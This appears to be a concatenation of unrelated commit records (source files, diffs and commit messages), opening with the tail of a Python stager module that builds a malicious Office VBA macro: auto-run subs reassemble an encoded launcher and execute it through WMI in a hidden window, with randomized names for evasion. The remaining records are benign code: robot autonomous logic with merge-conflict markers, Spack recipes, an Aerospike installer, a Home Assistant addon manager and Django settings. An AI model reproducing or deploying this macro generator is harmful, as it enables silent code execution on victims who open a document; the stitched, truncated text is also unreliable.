'Value' : '/tmp/macro'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
Str = ''.join(random.choice(string.letters) for i in range(LengthOfVari))
Method=''.join(random.choice(string.letters) for i in range(LengthOfVari))
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
chunks = list(helpers.chunks(launcher, 50))
payload = "\tDim "+Str+" As String\n"
payload += "\t"+Str+" = \"" + str(chunks[0]) + "\"\n"
for chunk in chunks[1:]:
payload += "\t"+Str+" = "+Str+" + \"" + str(chunk) + "\"\n"
macro = "Sub Auto_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro = "Sub AutoOpen()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Sub Document_Open()\n"
macro += "\t"+Method+"\n"
macro += "End Sub\n\n"
macro += "Public Function "+Method+"() As Variant\n"
macro += payload
macro += "\tConst HIDDEN_WINDOW = 0\n"
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n"
macro += "End Function\n"
return macro
|
Python
| 0.000001
|
@@ -3286,28 +3286,57 @@
es)%0A
-
+LengthOfVari=random.randint(1,35)
%0A Str
|
8cf3e7a822517ba12abe72def6d4a2cd0180fb19
|
Fix autonomous mode merge
|
robot/robot/src/autonomous/main.py
|
robot/robot/src/autonomous/main.py
|
try:
import wpilib
except ImportError:
from pyfrc import wpilib
class main(object):
'''autonomous program'''
DEFAULT = True
MODE_NAME = "Tim's Mode"
def __init__ (self, components):
''' initialize'''
super().__init__()
self.drive = components['drive']
self.intake = components['intake']
self.catapult = components['catapult']
# number of seconds to drive forward, allow us to tune it via SmartDashboard
wpilib.SmartDashboard.PutNumber('AutoDriveTime', 1.4)
wpilib.SmartDashboard.PutNumber('AutoDriveSpeed', 0.5)
def on_enable(self):
'''these are called when autonomous starts'''
self.drive_time = wpilib.SmartDashboard.GetNumber('AutoDriveTime')
self.drive_speed = wpilib.SmartDashboard.GetNumber('AutoDriveSpeed')
print("Team 1418 autonomous code for 2014")
print("-> Drive time:", self.drive_time, "seconds")
print("-> Drive speed:", self.drive_speed)
#print("-> Battery voltage: %.02fv" % wpilib.DriverStation.GetInstance().GetBatteryVoltage())
def on_disable(self):
'''This function is called when autonomous mode is disabled'''
pass
def update(self, time_elapsed):
'''The actual autonomous program'''
# always pulldown
if time_elapsed > 0.3:
self.catapult.pulldown()
if time_elapsed < 0.3:
# Get the arm down so that we can winch
self.intake.armDown()
<<<<<<< HEAD
if time_elapsed > 0.5:
self.catapult.autowinch()
elif time_elapsed < 1.5:
=======
elif time_elapsed < 1.4:
>>>>>>> branch 'master' of https://github.com/frc1418/2014.git
# The arm is at least far enough down now that
# the winch won't hit it, start winching
self.intake.armDown()
elif time_elapsed < 2.0:
# We're letting the winch take its sweet time
pass
elif time_elapsed < 2.0 + self.drive_time:
# Drive slowly forward for N seconds
self.drive.move(0, self.drive_speed, 0)
elif time_elapsed < 2.0 + self.drive_time + 1.0:
# Finally, fire and keep firing for 1 seconds
self.catapult.launchNoSensor()
<<<<<<< HEAD
=======
>>>>>>> 907e2ebf9b7991b9ebf2ee093eefd40c2ccb1b98
|
Python
| 0.000083
|
@@ -1658,242 +1658,51 @@
wn()
-%0D%0A%3C%3C%3C%3C%3C%3C%3C HEAD%0A if time_elapsed %3E 0.5:%0D%0A self.catapult.autowinch()%0D%0A elif time_elapsed %3C 1.5:%0D%0A=======%0A %0D%0A elif time_elapsed %3C 1.4:%0D%0A%3E%3E%3E%3E%3E%3E%3E branch 'master' of https://github.com/frc1418/2014.git
+%0A %0D%0A elif time_elapsed %3C 1.4:
%0A
@@ -2332,118 +2332,5 @@
or()
-%0D%0A%3C%3C%3C%3C%3C%3C%3C HEAD%0A %0A=======%0A %0D%0A%0D%0A %0A%3E%3E%3E%3E%3E%3E%3E 907e2ebf9b7991b9ebf2ee093eefd40c2ccb1b98
%0A
|
c435f6039b344829380db4bf92f80ff4d5de8972
|
fixes scrolling_benchmark.
|
tools/telemetry/telemetry/core/chrome/android_platform_backend.py
|
tools/telemetry/telemetry/core/chrome/android_platform_backend.py
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import sys
from telemetry.core.chrome import platform
from telemetry.core.chrome import platform_backend
# Get build/android scripts into our path.
sys.path.append(
os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../../build/android')))
from pylib import perf_tests_helper # pylint: disable=F0401
from pylib import thermal_throttle # pylint: disable=F0401
try:
from pylib import surface_stats_collector # pylint: disable=F0401
except Exception:
surface_stats_collector = None
class AndroidPlatformBackend(platform_backend.PlatformBackend):
def __init__(self, adb, no_performance_mode):
super(AndroidPlatformBackend, self).__init__()
self._adb = adb
self._surface_stats_collector = None
self._perf_tests_setup = perf_tests_helper.PerfTestSetup(self._adb)
self._thermal_throttle = thermal_throttle.ThermalThrottle(self._adb)
self._no_performance_mode = no_performance_mode
self._raw_display_frame_rate_measurements = []
if self._no_performance_mode:
logging.warning('CPU governor will not be set!')
def IsRawDisplayFrameRateSupported(self):
return True
def StartRawDisplayFrameRateMeasurement(self):
assert not self._surface_stats_collector
self._surface_stats_collector = \
surface_stats_collector.SurfaceStatsCollector(self._adb)
self._surface_stats_collector.Start()
def StopRawDisplayFrameRateMeasurement(self):
self._surface_stats_collector.Stop()
for r in self._surface_stats_collector.GetResults():
self._raw_display_frame_rate_measurements.append(
platform.Platform.RawDisplayFrameRateMeasurement(
r.name, r.value, r.unit))
self._surface_stats_collector = None
def GetRawDisplayFrameRateMeasurements(self):
return self._raw_display_frame_rate_measurements
def SetFullPerformanceModeEnabled(self, enabled):
if self._no_performance_mode:
return
if enabled:
self._perf_tests_setup.SetUp()
else:
self._perf_tests_setup.TearDown()
def CanMonitorThermalThrottling(self):
return True
def IsThermallyThrottled(self):
return self._thermal_throttle.IsThrottled()
def HasBeenThermallyThrottled(self):
return self._thermal_throttle.HasBeenThrottled()
def GetSystemCommitCharge(self):
for line in self._adb.RunShellCommand('dumpsys meminfo', log_result=False):
if line.startswith('Total PSS: '):
return int(line.split()[2]) * 1024
return 0
def GetMemoryStats(self, pid):
memory_usage = self._adb.GetMemoryUsageForPid(pid)[0]
return {'ProportionalSetSize': memory_usage['Pss'] * 1024,
'PrivateDirty': memory_usage['Private_Dirty'] * 1024}
def GetIOStats(self, pid):
return {}
def GetChildPids(self, pid):
child_pids = []
ps = self._adb.RunShellCommand('ps', log_result=False)[1:]
for line in ps:
data = line.split()
curr_pid = data[1]
curr_name = data[-1]
if int(curr_pid) == pid:
name = curr_name
for line in ps:
data = line.split()
curr_pid = data[1]
curr_name = data[-1]
if curr_name.startswith(name) and curr_name != name:
child_pids.append(int(curr_pid))
break
return child_pids
|
Python
| 0.999861
|
@@ -1978,27 +1978,72 @@
lf):%0A ret
-urn
+ = self._raw_display_frame_rate_measurements%0A
self._raw_d
@@ -2072,16 +2072,36 @@
urements
+ = %5B%5D%0A return ret
%0A%0A def
|
7bfb4a2d7daf5baaa3eb88f1d85edd813ea2aaed
|
enable gobject option in cairo (#21404)
|
var/spack/repos/builtin/packages/gobject-introspection/package.py
|
var/spack/repos/builtin/packages/gobject-introspection/package.py
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import spack.hooks.sbang as sbang
class GobjectIntrospection(Package):
"""The GObject Introspection is used to describe the program APIs and
collect them in a uniform, machine readable format.Cairo is a 2D graphics
library with support for multiple output"""
homepage = "https://wiki.gnome.org/Projects/GObjectIntrospection"
url = "http://ftp.gnome.org/pub/gnome/sources/gobject-introspection/1.49/gobject-introspection-1.49.2.tar.xz"
version('1.56.1', sha256='5b2875ccff99ff7baab63a34b67f8c920def240e178ff50add809e267d9ea24b')
version('1.49.2', sha256='73d59470ba1a546b293f54d023fd09cca03a951005745d86d586b9e3a8dde9ac')
version('1.48.0', sha256='fa275aaccdbfc91ec0bc9a6fd0562051acdba731e7d584b64a277fec60e75877')
depends_on("glib@2.49.2:", when="@1.49.2:")
# version 1.48.0 build fails with glib 2.49.4
depends_on("glib@2.48.1", when="@1.48.0")
depends_on("python")
depends_on("cairo")
depends_on("bison", type="build")
depends_on("flex", type="build")
depends_on("pkgconfig", type="build")
# GobjectIntrospection does not build with sed from darwin:
depends_on('sed', when='platform=darwin', type='build')
# This package creates several scripts from
# toosl/g-ir-tool-template.in. In their original form these
# scripts end up with a sbang line like
#
# `#!/usr/bin/env /path/to/spack/python`.
#
# These scripts are generated and then used as part of the build
# (other packages also use the scripts after they've been
# installed).
#
# The path to the spack python can become too long. Because these
# tools are used as part of the build, the normal hook that fixes
# this problem can't help us.
# This package fixes the problem in two steps:
# - it rewrites the g-ir-tool-template so that its sbang line
# refers directly to spack's python (filter_file step below); and
# - it patches the Makefile.in so that the generated Makefile has an
# extra sed expression in its TOOL_SUBSTITUTION that results in
# an `#!/bin/bash /path/to/spack/bin/sbang` unconditionally being
# inserted into the scripts as they're generated.
patch("sbang.patch")
def url_for_version(self, version):
url = 'http://ftp.gnome.org/pub/gnome/sources/gobject-introspection/{0}/gobject-introspection-{1}.tar.xz'
return url.format(version.up_to(2), version)
def setup_run_environment(self, env):
env.prepend_path("GI_TYPELIB_PATH",
join_path(self.prefix.lib, 'girepository-1.0'))
def setup_dependent_build_environment(self, env, dependent_spec):
env.prepend_path("XDG_DATA_DIRS", self.prefix.share)
env.prepend_path("GI_TYPELIB_PATH",
join_path(self.prefix.lib, 'girepository-1.0'))
def setup_dependent_run_environment(self, env, dependent_spec):
env.prepend_path("XDG_DATA_DIRS", self.prefix.share)
env.prepend_path("GI_TYPELIB_PATH",
join_path(self.prefix.lib, 'girepository-1.0'))
def install(self, spec, prefix):
configure("--prefix=%s" % prefix)
# we need to filter this file to avoid an overly long hashbang line
filter_file('#!/usr/bin/env @PYTHON@', '#!@PYTHON@',
'tools/g-ir-tool-template.in')
make()
make("install")
def setup_build_environment(self, env):
env.set('SPACK_SBANG', sbang.sbang_install_path())
@property
def parallel(self):
return not self.spec.satisfies('%fj')
|
Python
| 0
|
@@ -1157,16 +1157,24 @@
n(%22cairo
++gobject
%22)%0A d
|
9963642c1cc05fb6d9dfe397b9ed811d4f7e3d26
|
add 4.6.1 and 3.10.1 (#24701)
|
var/spack/repos/builtin/packages/py-importlib-metadata/package.py
|
var/spack/repos/builtin/packages/py-importlib-metadata/package.py
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyImportlibMetadata(PythonPackage):
"""Read metadata from Python packages."""
homepage = "https://importlib-metadata.readthedocs.io/"
pypi = "importlib_metadata/importlib_metadata-1.2.0.tar.gz"
version('3.10.0', sha256='c9db46394197244adf2f0b08ec5bc3cf16757e9590b02af1fca085c16c0d600a')
version('2.0.0', sha256='77a540690e24b0305878c37ffd421785a6f7e53c8b5720d211b211de8d0e95da')
version('1.2.0', sha256='41e688146d000891f32b1669e8573c57e39e5060e7f5f647aa617cd9a9568278')
version('0.23', sha256='aa18d7378b00b40847790e7c27e11673d7fed219354109d0e7b9e5b25dc3ad26')
version('0.19', sha256='23d3d873e008a513952355379d93cbcab874c58f4f034ff657c7a87422fa64e8')
version('0.18', sha256='cb6ee23b46173539939964df59d3d72c3e0c1b5d54b84f1d8a7e912fe43612db')
depends_on('python@3.6:', type=('build', 'run'), when='@3:')
depends_on('python@2.7:2.8,3.5:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('py-setuptools-scm', type='build')
depends_on('py-setuptools-scm@3.4.1:+toml', type='build', when='@3:')
depends_on('py-zipp@0.5:', type=('build', 'run'))
depends_on('py-pathlib2', when='^python@:2', type=('build', 'run'))
depends_on('py-contextlib2', when='^python@:2', type=('build', 'run'))
depends_on('py-configparser@3.5:', when='^python@:2', type=('build', 'run'))
depends_on('py-typing-extensions@3.6.4:', type=('build', 'run'), when='@3: ^python@:3.7.999')
|
Python
| 0
|
@@ -427,16 +427,209 @@
ar.gz%22%0A%0A
+ version('4.6.1', sha256='079ada16b7fc30dfbb5d13399a5113110dab1aa7c2bc62f66af75f0b717c8cac')%0A version('3.10.1', sha256='c9356b657de65c53744046fa8f7358afe0714a1af7d570c00c3835c2d724a7c1')%0A
vers
|
a2749190545a6765a479777b1ea97d2f9090593f
|
clean up project config a bit
|
jailscraper/project_config.py
|
jailscraper/project_config.py
|
"""ProPublica specific configuration and utilities"""
import os
PROJECT_SLUG = 'cookcountyjail2'
INMATE_URL_TEMPLATE = 'http://www2.cookcountysheriff.org/search2/details.asp?jailnumber={0}'
"""Sets the maximum jail number to scan for by default.
If the subsequent jail number returns a 2xx status code, it will be incremented
until an error code is sent. [@TODO: Not implemented, see
https://github.com/propublica/cookcountyjail2/issues/9]
"""
MAX_DEFAULT_JAIL_NUMBER = 400
def get_secrets():
"""Get all environment variables associated with this project.
Reads environment variables that start with PROJECT_SLUG, strips out the slug
and adds them to a dictionary.
"""
secrets = {}
for k, v in os.environ.items():
if k.startswith(PROJECT_SLUG):
new_k = k[len(PROJECT_SLUG) + 1:]
secrets[new_k] = v
return secrets
SECRETS = get_secrets()
S3_BUCKET = SECRETS['S3_BUCKET']
TARGET = SECRETS['TARGET']
S3_URL = 's3://{0}/{1}'.format(SECRETS['S3_BUCKET'], SECRETS['TARGET'])
|
Python
| 0
|
@@ -58,424 +58,53 @@
ort
-os%0A%0APROJECT_SLUG = 'cookcountyjail2'%0AINMATE_URL_TEMPLATE = 'http://www2.cookcountysheriff.org/search2/details.asp?jailnumber=%7B0%7D'%0A%0A%22%22%22Sets the maximum jail number to scan for by default.%0A%0AIf the subsequent jail number returns a 2xx status code, it will be incremented%0Auntil an error code is sent. %5B@TODO: Not implemented, see%0Ahttps://github.com/propublica/cookcountyjail2/issues/9%5D%0A%22%22%22%0AMAX_DEFAULT_JAIL_NUMBER = 400%0A
+boto3%0Aimport botocore%0Aimport os%0A%0A%0A### Helpers
%0A%0Ade
|
dde62362955ca4b10f3c1fec4e3b7777b03141f5
|
remove ContextDict since std has ChainMap
|
jasily/collection/__init__.py
|
jasily/collection/__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017~2999 - cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from collections import KeysView, ValuesView, ItemsView, MutableMapping
_NO_VALUE = object()
class ContextDict(MutableMapping):
'''context dict can override base_dict.'''
def __init__(self, base_dict: dict, *args, **kwargs):
if base_dict is None:
raise ValueError('base_dict cannot be None')
self._base_dict = base_dict
self._data = dict(*args, **kwargs) # data maybe not empty.
def __setitem__(self, key, value):
self._data[key] = value
def __delitem__(self, key):
del self._data[key]
def __getitem__(self, key):
value = self._data.get(key, _NO_VALUE)
if value is _NO_VALUE:
value = self._base_dict[key]
return value
def __iter__(self):
for k in self._data:
yield k
for k in self._base_dict:
if k not in self._data:
yield k
def __len__(self):
# base dict may change, so we cannot cache the size.
d1 = self._data
d2 = self._base_dict
d1_len = len(d1)
d2_len = len(d2)
if d1_len > d2_len: # ensure d1 < d2
d1, d2 = d2, d1
total_size = d1_len + d2_len
for k in d1:
if k in d2:
total_size -= 1
return total_size
def scope(self):
'''create a scoped dict.'''
return ContextDict(self)
def __enter__(self):
'''return a new context dict.'''
return self.scope()
def __exit__(self, *args):
pass
|
Python
| 0.000013
|
@@ -130,1538 +130,4 @@
---%0A
-%0Afrom collections import KeysView, ValuesView, ItemsView, MutableMapping%0A%0A_NO_VALUE = object()%0A%0Aclass ContextDict(MutableMapping):%0A '''context dict can override base_dict.'''%0A%0A def __init__(self, base_dict: dict, *args, **kwargs):%0A if base_dict is None:%0A raise ValueError('base_dict cannot be None')%0A%0A self._base_dict = base_dict%0A self._data = dict(*args, **kwargs) # data maybe not empty.%0A%0A def __setitem__(self, key, value):%0A self._data%5Bkey%5D = value%0A%0A def __delitem__(self, key):%0A del self._data%5Bkey%5D%0A%0A def __getitem__(self, key):%0A value = self._data.get(key, _NO_VALUE)%0A if value is _NO_VALUE:%0A value = self._base_dict%5Bkey%5D%0A return value%0A%0A def __iter__(self):%0A for k in self._data:%0A yield k%0A for k in self._base_dict:%0A if k not in self._data:%0A yield k%0A%0A def __len__(self):%0A # base dict may change, so we cannot cache the size.%0A d1 = self._data%0A d2 = self._base_dict%0A d1_len = len(d1)%0A d2_len = len(d2)%0A if d1_len %3E d2_len: # ensure d1 %3C d2%0A d1, d2 = d2, d1%0A total_size = d1_len + d2_len%0A for k in d1:%0A if k in d2:%0A total_size -= 1%0A return total_size%0A%0A def scope(self):%0A '''create a scoped dict.'''%0A return ContextDict(self)%0A%0A def __enter__(self):%0A '''return a new context dict.'''%0A return self.scope()%0A%0A def __exit__(self, *args):%0A pass%0A
|
a7c94079f3fde0550d65eabbadb575fddbb31939
|
Add vm_util
|
perfkitbenchmarker/linux_packages/aerospike_server.py
|
perfkitbenchmarker/linux_packages/aerospike_server.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing aerospike server installation and cleanup functions."""
import logging
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker.linux_packages import INSTALL_DIR
FLAGS = flags.FLAGS
GIT_REPO = 'https://github.com/aerospike/aerospike-server.git'
GIT_TAG = '3.7.5'
AEROSPIKE_DIR = '%s/aerospike-server' % INSTALL_DIR
AEROSPIKE_CONF_PATH = '%s/as/etc/aerospike_dev.conf' % AEROSPIKE_DIR
AEROSPIKE_DEFAULT_TELNET_PORT = 3003
MEMORY = 'memory'
DISK = 'disk'
flags.DEFINE_enum('aerospike_storage_type', MEMORY, [MEMORY, DISK],
'The type of storage to use for Aerospike data. The type of '
'disk is controlled by the "data_disk_type" flag.')
flags.DEFINE_integer('aerospike_replication_factor', 1,
'Replication factor for aerospike server.')
flags.DEFINE_integer('aerospike_transaction_threads_per_queue', 4,
'Number of threads per transaction queue.')
def _Install(vm):
"""Installs the Aerospike server on the VM."""
vm.Install('build_tools')
vm.Install('lua5_1')
vm.Install('openssl')
vm.RemoteCommand('git clone {0} {1}'.format(GIT_REPO, AEROSPIKE_DIR))
vm.RemoteCommand('cd {0} && git checkout {1} && git submodule update --init '
'&& make'.format(AEROSPIKE_DIR, GIT_TAG))
def YumInstall(vm):
"""Installs the memtier package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the memtier package on the VM."""
_Install(vm)
@vm_util.Retry(poll_interval=5, timeout=300,
retryable_exceptions=(errors.Resource.RetryableCreationError))
def _WaitForServerUp(server):
"""Block until the Aerospike server is up and responsive.
Will timeout after 5 minutes, and raise an exception. Before the timeout
expires any exceptions are caught and the status check is retried.
We check the status of the server by connecting to Aerospike's out
of band telnet management port and issue a 'status' command. This should
return 'ok' if the server is ready. Per the aerospike docs, this always
returns 'ok', i.e. if the server is not up the connection will fail or we
would get no response at all.
Args:
server: VirtualMachine Aerospike has been installed on.
Raises:
errors.Resource.RetryableCreationError when response is not 'ok' or if there
is an error connecting to the telnet port or otherwise running the remote
check command.
"""
address = server.internal_ip
port = AEROSPIKE_DEFAULT_TELNET_PORT
logging.info("Trying to connect to Aerospike at %s:%s" % (address, port))
try:
out, _ = server.RemoteCommand(
'(echo -e "status\n" ; sleep 1)| netcat %s %s' % (address, port))
if out.startswith('ok'):
logging.info("Aerospike server status is OK. Server up and running.")
return
except errors.VirtualMachine.RemoteCommandError as e:
raise errors.Resource.RetryableCreationError(
"Aerospike server not up yet: %s." % str(e))
else:
raise errors.Resource.RetryableCreationError(
"Aerospike server not up yet. Expected 'ok' but got '%s'." % out)
def ConfigureAndStart(server, seed_node_ips=None):
"""Prepare the Aerospike server on a VM.
Args:
server: VirtualMachine to install and start Aerospike on.
seed_node_ips: internal IP addresses of seed nodes in the cluster.
Leave unspecified for a single-node deployment.
"""
server.Install('aerospike_server')
seed_node_ips = seed_node_ips or [server.internal_ip]
if FLAGS.aerospike_storage_type == DISK:
devices = [scratch_disk.GetDevicePath()
for scratch_disk in server.scratch_disks]
else:
devices = []
server.RenderTemplate(
data.ResourcePath('aerospike.conf.j2'), AEROSPIKE_CONF_PATH,
{'devices': devices,
'memory_size': int(server.total_memory_kb * 0.8),
'seed_addresses': seed_node_ips,
'transaction_threads_per_queue':
FLAGS.aerospike_transaction_threads_per_queue,
'replication_factor': FLAGS.aerospike_replication_factor})
for scratch_disk in server.scratch_disks:
server.RemoteCommand('sudo umount %s' % scratch_disk.mount_point)
server.RemoteCommand('cd %s && make init' % AEROSPIKE_DIR)
server.RemoteCommand('cd %s; nohup sudo make start &> /dev/null &' %
AEROSPIKE_DIR)
_WaitForServerUp(server)
logging.info("Aerospike server configured and started.")
def Uninstall(vm):
vm.RemoteCommand('rm -rf %s' % AEROSPIKE_DIR)
|
Python
| 0
|
@@ -810,16 +810,55 @@
t flags%0A
+from perfkitbenchmarker import vm_util%0A
from per
|
544c009b9cd0fa7d540e955567b533d6bc87f155
|
Fix rewrite config to addon on restart (#71)
|
hassio/addons/__init__.py
|
hassio/addons/__init__.py
|
"""Init file for HassIO addons."""
import asyncio
import logging
import shutil
from .data import AddonsData
from .git import AddonsRepoHassIO, AddonsRepoCustom
from ..const import STATE_STOPPED, STATE_STARTED
from ..dock.addon import DockerAddon
_LOGGER = logging.getLogger(__name__)
class AddonManager(AddonsData):
"""Manage addons inside HassIO."""
def __init__(self, config, loop, dock):
"""Initialize docker base wrapper."""
super().__init__(config)
self.loop = loop
self.dock = dock
self.repositories = []
self.dockers = {}
async def prepare(self, arch):
"""Startup addon management."""
self.arch = arch
# init hassio repository
self.repositories.append(AddonsRepoHassIO(self.config, self.loop))
# init custom repositories
for url in self.config.addons_repositories:
self.repositories.append(
AddonsRepoCustom(self.config, self.loop, url))
# load addon repository
tasks = [addon.load() for addon in self.repositories]
if tasks:
await asyncio.wait(tasks, loop=self.loop)
# read data from repositories
self.read_data_from_repositories()
self.merge_update_config()
# load installed addons
for addon in self.list_installed:
self.dockers[addon] = DockerAddon(
self.config, self.loop, self.dock, self, addon)
await self.dockers[addon].attach()
async def add_git_repository(self, url):
"""Add a new custom repository."""
if url in self.config.addons_repositories:
_LOGGER.warning("Repository already exists %s", url)
return False
repo = AddonsRepoCustom(self.config, self.loop, url)
if not await repo.load():
_LOGGER.error("Can't load from repository %s", url)
return False
self.config.addons_repositories = url
self.repositories.append(repo)
return True
def drop_git_repository(self, url):
"""Remove a custom repository."""
for repo in self.repositories:
if repo.url == url:
self.repositories.remove(repo)
self.config.drop_addon_repository(url)
repo.remove()
return True
return False
async def reload(self):
"""Update addons from repo and reload list."""
tasks = [addon.pull() for addon in self.repositories]
if not tasks:
return
await asyncio.wait(tasks, loop=self.loop)
# read data from repositories
self.read_data_from_repositories()
self.merge_update_config()
# remove stalled addons
for addon in self.list_detached:
_LOGGER.warning("Dedicated addon '%s' found!", addon)
async def auto_boot(self, start_type):
"""Boot addons with mode auto."""
boot_list = self.list_startup(start_type)
tasks = [self.start(addon) for addon in boot_list]
_LOGGER.info("Startup %s run %d addons", start_type, len(tasks))
if tasks:
await asyncio.wait(tasks, loop=self.loop)
async def install(self, addon, version=None):
"""Install a addon."""
if not self.exists_addon(addon):
_LOGGER.error("Addon %s not exists for install", addon)
return False
if self.arch not in self.get_arch(addon):
_LOGGER.error("Addon %s not supported on %s", addon, self.arch)
return False
if self.is_installed(addon):
_LOGGER.error("Addon %s is already installed", addon)
return False
if not self.path_data(addon).is_dir():
_LOGGER.info("Create Home-Assistant addon data folder %s",
self.path_data(addon))
self.path_data(addon).mkdir()
addon_docker = DockerAddon(
self.config, self.loop, self.dock, self, addon)
version = version or self.get_last_version(addon)
if not await addon_docker.install(version):
return False
self.dockers[addon] = addon_docker
self.set_addon_install(addon, version)
return True
async def uninstall(self, addon):
"""Remove a addon."""
if not self.is_installed(addon):
_LOGGER.error("Addon %s is already uninstalled", addon)
return False
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
if not await self.dockers[addon].remove():
return False
if self.path_data(addon).is_dir():
_LOGGER.info("Remove Home-Assistant addon data folder %s",
self.path_data(addon))
shutil.rmtree(str(self.path_data(addon)))
self.dockers.pop(addon)
self.set_addon_uninstall(addon)
return True
async def state(self, addon):
"""Return running state of addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return
if await self.dockers[addon].is_running():
return STATE_STARTED
return STATE_STOPPED
async def start(self, addon):
"""Set options and start addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
if not self.write_addon_options(addon):
_LOGGER.error("Can't write options for addon %s", addon)
return False
return await self.dockers[addon].run()
async def stop(self, addon):
"""Stop addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
return await self.dockers[addon].stop()
async def update(self, addon, version=None):
"""Update addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
version = version or self.get_last_version(addon)
is_running = await self.dockers[addon].is_running()
# update
if await self.dockers[addon].update(version):
self.set_addon_update(addon, version)
if is_running:
await self.start(addon)
return True
return False
async def restart(self, addon):
"""Restart addon."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
return await self.dockers[addon].restart()
async def logs(self, addon):
"""Return addons log output."""
if addon not in self.dockers:
_LOGGER.error("No docker found for addon %s", addon)
return False
return await self.dockers[addon].logs()
|
Python
| 0
|
@@ -6671,32 +6671,175 @@
return False%0A%0A
+ if not self.write_addon_options(addon):%0A _LOGGER.error(%22Can't write options for addon %25s%22, addon)%0A return False%0A%0A
return a
|
21624d6434f2c47577d464ec57d44c479c9b43d7
|
Edit settings
|
spacelaunchnow/settings.py
|
spacelaunchnow/settings.py
|
"""
Django settings for spacelaunchnow project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from spacelaunchnow import config
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'assets')
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config.keys['DJANGO_SECRET_KEY']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['localhost', '.calebjones.me', '159.203.85.8', '.spacelaunchnow.me', '127.0.0.1', 'spacelaunchnow.me']
REST_FRAMEWORK = {
'PAGE_SIZE': 1000,
'DEFAULT_MODEL_SERIALIZER_CLASS': 'drf_toolbox.serializers.ModelSerializer',
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',),
'DEFAULT_THROTTLE_CLASSES': (
'rest_framework.throttling.AnonRateThrottle',
'rest_framework.throttling.UserRateThrottle'
),
'DEFAULT_THROTTLE_RATES': {
'anon': '100/day',
'user': '1000/day'
},
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
LOGIN_REDIRECT_URL = '/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
